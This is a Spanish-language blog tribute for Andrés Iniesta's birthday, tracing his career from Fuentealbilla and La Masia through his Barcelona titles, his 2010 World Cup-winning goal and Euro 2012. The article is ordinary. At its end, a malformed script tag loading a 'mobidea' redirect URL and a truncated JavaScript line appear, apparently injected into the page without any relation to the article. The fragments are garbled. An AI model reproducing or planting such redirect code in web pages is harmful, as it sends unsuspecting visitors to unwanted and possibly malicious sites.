Feliz cumpleaños al mago de Albacete, Andrés Iniesta

Uno de los magos del fútbol de la última época celebra hoy su cumpleaños, Andrés Iniesta Luján, nacido en Fuentealbilla el 11 de mayo de 1984.

Empezó a jugar a en la pista de fútbol sala de Fuentealbilla antes de enrolarse en las categorías inferiores del Albacete Balompié. A los 12 años destacó en un torneo alevín en Brunete y fue fichado por el FC Barcelona en una decisión en la que intervinieron Oriol Tort, Joan Martínez Vilaseca y Albert Benaiges. Ingresó en La Masia el 17 de septiembre de 1996 convirtiéndose pronto en un jugador de referencia.

Sus actuaciones con la selección española sub 16 y sub 19, con la que conquistó dos campeonatos de Europa, le situaron en el panorama internacional. Con solo 16 años ya participó en un entrenamiento del primer equipo del Barça con Llorenç Serra Ferrer y el 29 de octubre de 2002, con 18 años, debutó de forma oficial con el conjunto blaugrana en Brujas en la Champions League. Su estreno en la Liga llegaría el 21 de diciembre del 2002 en Mallorca y en el Camp Nou lo haría el 5 de enero del 2003.

En la temporada 2004-05 pasó a formar parte de la plantilla del FC Barcelona de forma oficial de la mano de Frank Rijkaard, con quien empezó a conquistar títulos: Dos Ligas consecutivas y la Champions League del 2006 en París. Iniesta sustituyó en el descanso a José Edmílson y fue decisivo en la remontada ante el Arsenal (2-1) para sumar su primera Champions.

A partir de la temporada 2008-09 su carrera se aceleró con la llegada de Pep Guardiola. El verano del 2008 había ganado la Eurocopa de Austria-Suiza con Luis Aragonés y Guardiola le dio galones convirtiéndole en uno de los cuatro capitanes de la plantilla. El 6 de mayo del 2009 marcó uno de los goles de su vida al Chelsea en Stamford Bridge, conocido como el “Iniestazo”, que permitió al Barça avanzar en las semifinales de la Champions League y ganar el título posteriormente en Roma. Iniesta jugó la final, pese a estar lesionado, y dio la asistencia del primer gol a Eto’o.

Fue clave en los 14 títulos del “Pep Team” y con la “Roja” hizo historia el 11 de julio del 2010 al marcar en el minuto 116 el gol que dio a España el primer Mundial de su historia en Sudáfrica. En la siguiente Eurocopa, de Polonia y Ucrania’12, ganó el título y fue designado como el mejor jugador del torneo.

Ya con Tito Vilanova al frente del equipo, sumó la Liga 2012-13, en la que el Barça igualó el récord de 100 puntos del Real Madrid (2011-12) y que estableció un récord de puntos sumados en una primera vuelta, 55 de 57 puntos posibles.

Actualmente milita en el Barcelona que está a punto de ganar la Liga, su carrera está por llegar a su fin pero nadie dudará, sin importar los colores que vista, que este mago es de los que más nos ha dado en el terreno de juego. ¡Feliz cumpleaños Andrés Iniesta!

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

var d=document;var s=d.createElement(”);